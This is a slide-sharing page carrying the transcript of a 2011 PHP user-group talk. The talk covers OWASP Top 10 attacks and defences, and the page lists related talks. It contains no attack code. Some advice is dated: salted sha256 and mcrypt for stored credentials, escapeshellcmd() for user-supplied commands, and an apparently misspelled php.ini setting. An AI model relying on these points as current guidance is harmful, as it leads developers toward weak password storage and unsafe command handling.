Docker for PHP Developers - Madison PHP 2017Docker for PHP Developers - Madison PHP 2017
Docker for PHP Developers - Madison PHP 2017
 
Docker for Developers - php[tek] 2017
Docker for Developers - php[tek] 2017Docker for Developers - php[tek] 2017
Docker for Developers - php[tek] 2017
 
Why Docker? Dayton PHP, April 2017
Why Docker? Dayton PHP, April 2017Why Docker? Dayton PHP, April 2017
Why Docker? Dayton PHP, April 2017
 
OOP Is More Then Cars and Dogs - Midwest PHP 2017
OOP Is More Then Cars and Dogs - Midwest PHP 2017OOP Is More Then Cars and Dogs - Midwest PHP 2017
OOP Is More Then Cars and Dogs - Midwest PHP 2017
 
From Docker to Production - SunshinePHP 2017
From Docker to Production - SunshinePHP 2017From Docker to Production - SunshinePHP 2017
From Docker to Production - SunshinePHP 2017
 
Docker for Developers - Sunshine PHP
Docker for Developers - Sunshine PHPDocker for Developers - Sunshine PHP
Docker for Developers - Sunshine PHP
 
Coming to Terms with OOP In Drupal - php[world] 2016
Coming to Terms with OOP In Drupal - php[world] 2016Coming to Terms with OOP In Drupal - php[world] 2016
Coming to Terms with OOP In Drupal - php[world] 2016
 
How We Got Here: A Brief History of Open Source
How We Got Here: A Brief History of Open SourceHow We Got Here: A Brief History of Open Source
How We Got Here: A Brief History of Open Source
 

Dernier

Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditSkynet Technologies
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 

Dernier (20)

Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance Audit
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 

PHP Security Tips

  • 1. PHP Security E-mail: chris@ctankersley.com Twitter: @dragonmantank Identi.ca: dragonmantank September 20, 2011 NWO-PUG 1
  • 2. Who are you and why are you in my house? Chris Tankersley Doing PHP for 8 Years Lots of projects no one uses, and a few that some do TL;DR https://github.com/dragonmantank NWO-PUG 2 September 20, 2011
  • 3. The Parts of Security It’s more than just a username/password NWO-PUG 3 September 20, 2011
  • 4. What is Secure Programming? Minimizing Attack Surface Establishing Secure Defaults Principle of Least Privilege Defense in Depth Fail Securely Don’t Trust Services or Users Separation of Duties Avoid Security through Obscurity Keep Security Simple Fix Security Issues Correctly September 20, 2011 NWO-PUG 4 https://www.owasp.org/index.php/Secure_Coding_Principles
  • 5. Most Common Attacks And how to avoid them NWO-PUG 5 September 20, 2011
  • 6. OWASP Top 10 Injection Cross-Site Scripting Broken Authentication and Session Management Insecure Direct Object References Cross-Site Request Forgery Security Misconfiguration Insecure Cryptographic Storage Failure To Restrict URL Access Insufficient Transport Layer Protection Unvalidated Redirects and Forwards NWO-PUG 6 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project September 20, 2011
  • 7. Injection NWO-PUG 7 September 20, 2011
  • 8. What is Injection? When a user or service corrupts a command due to improper validation of input September 20, 2011 NWO-PUG 8
  • 9. Many Shapes and Sizes SQL Injection Command Injection HTML Injection September 20, 2011 NWO-PUG 9
  • 10. Protecting against Injections Attacks Filter user input Escape anything not hard-coded Ignore $_REQUEST NWO-PUG 10 September 20, 2011
  • 11. SQL Injection NWO-PUG 11 September 20, 2011
  • 12. A Bit More Real Life NWO-PUG 12 September 20, 2011
  • 13. Protecting against SQL Injection Use PDO and prepared statements NWO-PUG 13 September 20, 2011
  • 14. Command Injection When your script calls an external program, users can run code NWO-PUG 14 September 20, 2011
  • 15. Protecting against Command Injection If allowing the user to specify commands, use escapeshellcmd() If allowing the user to specify arguments, use escapeshellarg() NWO-PUG 15 September 20, 2011
  • 16. HTML/Script Injection HTML Injection: When user input is used to create new markup that the application did not expect Script Injection: When user input is used to add new scripting to a page NWO-PUG 16 September 20, 2011
  • 17. HTML/Script Injection NWO-PUG 17 September 20, 2011
  • 18. Protecting against HTML/Script Injection Decide if you really need to take HTML input If you do: Use an HTML cleaner like Tidy or htmLawed Create a whitelist of allowed tags If you don’t: Use htmlentities()/htmlspecialchars() NWO-PUG 18 September 20, 2011
  • 19. Cross Site Scripting Or XSS NWO-PUG 19 September 20, 2011
  • 20. What is it? When a user injects a script into a page or extra JS into a command to send information to another site September 20, 2011 NWO-PUG 20
  • 21. How to avoid XSS? Since this is an injection attack, use the same steps as a HTML/Script injection NWO-PUG 21 September 20, 2011
  • 22. Broken Authentication and Session Management NWO-PUG 22 September 20, 2011
  • 23. What is it? Insecure storing of credentials Session IDs exposed via URL Session fixation attacks September 20, 2011 NWO-PUG 23
  • 24. Storing Credentials Hash with a salt using the hash() command Do not use md5 or sha1, use at least sha256 md5 and sha1 are broken and not recommended for secure hashing If you have to use the raw data, encrypt using mcrypt() Use AES256 (RIJNDAEL 256) NWO-PUG 24 September 20, 2011
  • 25. Session IDs in URL Commonly used when cookies can’t be enabled Make sure the following is set in your php.ini: session.use_trans_id = 0 session.use_only_cookies = 1 NWO-PUG 25 September 20, 2011
  • 26. Session Fixation What happens if your users don’t log out? Use sessions to detect login status NWO-PUG 26 September 20, 2011
  • 27. Insecure Direct Object References NWO-PUG 27 September 20, 2011
  • 28. What is it? Making sure that what the user is accessing they have access to. Should be handled by checking authorization when accessed, or mapping This is not an injection attack, but a logic attack September 20, 2011 NWO-PUG 28
  • 29. An Example NWO-PUG 29 September 20, 2011
  • 30. How to Avoid Always check to make sure the user has authorization to access the resource Map variables/whitelist to make it harder NWO-PUG 30 September 20, 2011
  • 31. Cross Site Request Forgery Or CSRF Attacks NWO-PUG 31 September 20, 2011
  • 32. What is it? When unauthorized commands are sent to and from a trusted website In days gone by, this would be done with Referral checking, but don’t trust referrer information September 20, 2011 NWO-PUG 32
  • 33. An example – Bank Transfer A bank transfer is done via $_GET variables User is authenticated but not logged out NWO-PUG 33 September 20, 2011
  • 34. How to avoid this Include a hidden element in the form with a one-time value NWO-PUG 34 September 20, 2011
  • 35. Security Misconfiguration NWO-PUG 35 September 20, 2011
  • 36. Beyond the scope of programming Check for server hardening guidelines for your OS Password rotation practices Understanding your settings Keep your stack up to date! September 20, 2011 NWO-PUG 36
  • 37. Insecure Cryptographic Storage NWO-PUG 37 September 20, 2011
  • 38. More of a logic problem Encrypting data in the database, but leaving it unencrypted during output Using unsalted hashes September 20, 2011 NWO-PUG 38
  • 39. How to avoid this Like when storing credentials, use a salt whenever hashing information Only decrypt data when it is needed NWO-PUG 39 September 20, 2011
  • 40. Failure to Restrict URL Access NWO-PUG 40 September 20, 2011
  • 41. What is it? When users can gain access to parts of the application just through URL manipulation When the app doesn’t check authorization properly September 20, 2011 NWO-PUG 41
  • 42. Security through Obscurity Don’t trust that just because a user doesn’t know a URL, they can’t get to it Fuzzers can find all kinds of things, especially if the app is common NWO-PUG 42 September 20, 2011
  • 43. How to avoid this ALWAYS check authorization. The extra CPU cycles are worth it. NWO-PUG 43 September 20, 2011
  • 44. Insufficient Transport Layer Protection NWO-PUG 44 September 20, 2011
  • 45. Not using SSL when you should If your data is sensitive, use SSL Are your logins behind SSL? There isn’t really an excuse. You can get an SSL cert for $9/year. September 20, 2011 NWO-PUG 45
  • 46. Unvalidated Redirects and Forwards NWO-PUG 46 September 20, 2011
  • 47. What is it? When an app doesn’t properly validate that the redirect destination is valid September 20, 2011 NWO-PUG 47
  • 48. Putting it Together NWO-PUG 48 September 20, 2011
  • 49. Attacking from Multiple Fronts Attackers will employ many different vectors in an attack HTML injection can take advantage of a Broken Auth system and use XSS or URL restrictions to force users to do unintended actions Script injection can lead to Session hijacking September 20, 2011 NWO-PUG 49
  • 50. Remember… Minimizing Attack Surface Establishing Secure Defaults Principle of Least Privilege Defense in Depth Fail Securely Don’t Trust Services or Users Separation of Duties Avoid Security through Obscurity Keep Security Simple Fix Security Issues Correctly September 20, 2011 NWO-PUG 50 https://www.owasp.org/index.php/Secure_Coding_Principles
  • 51. Questions? September 20, 2011 NWO-PUG 51